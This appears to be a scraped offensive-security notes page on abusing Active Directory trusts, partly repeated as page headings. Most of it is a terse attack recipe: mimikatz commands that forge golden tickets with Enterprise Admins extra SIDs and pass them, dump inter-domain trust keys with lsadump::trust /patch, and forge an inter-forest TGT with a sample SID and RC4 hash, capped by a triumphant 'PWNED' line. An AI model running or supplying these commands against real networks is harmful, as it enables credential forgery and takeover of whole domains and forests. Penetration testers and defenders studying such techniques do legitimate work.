Types of trusts:

1) Directional

2) Transitive

Inter-realm TGTs

Enterprise Admins (EA) Group default SID: S-1-5-21-ROOT_DOMAIN-519

1)

Get-ADComputer -Identity "DC"

2)

Get-ADGroup -Identity "Enterprise Admins" -server PARENT_DOMAIN_CONTROLLER_FQDN

3)

mimikatz.exe

4)

privilege::debug

5)

kerberos::golden /user:Administrator /domain:DOMAIN /sid:DC_SID /service:krbtgt /rc4:KRBTGT_HASH /sids:ENTERPRISE_ADMIN_GROUP_SID /ptt

6) PWWWWWWWWWWNEEDDD!!!!!!

Obtain trust key between current domain and external domain

Invoke-Mimikatz -Command '"lsadump::trust /patch"'

An inter-forest TGT can be forged

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:Security.local /sid:S-1-5-21-1874506000-3219952063-538504511 /rc4:815720462a1b48256f16740b70356b7f /service:krbtgt /target:Vault.local /ticket:C:\AD\trust_forest_tkt.kirbi"'

PreviousChild Domain to Parent Domain - Forest Compromise - extra SIDs (parent/child) (child/parent)NextEnumerate Trust Relationship

Last updated 4 months ago

hashtag1) Directional

hashtag2) Transitive

hashtagEnterprise Admins (EA) Group default SID: S-1-5-21-ROOT_DOMAIN-519

hashtag1)

hashtag2)

hashtag3)

hashtag4)

hashtag5)

hashtag6) PWWWWWWWWWWNEEDDD!!!!!!

hashtagObtain trust key between current domain and external domain

hashtagAn inter-forest TGT can be forged

1) Directional

2) Transitive

Enterprise Admins (EA) Group default SID: S-1-5-21-ROOT_DOMAIN-519

1)

2)

3)

4)

5)

6) PWWWWWWWWWWNEEDDD!!!!!!

Obtain trust key between current domain and external domain

An inter-forest TGT can be forged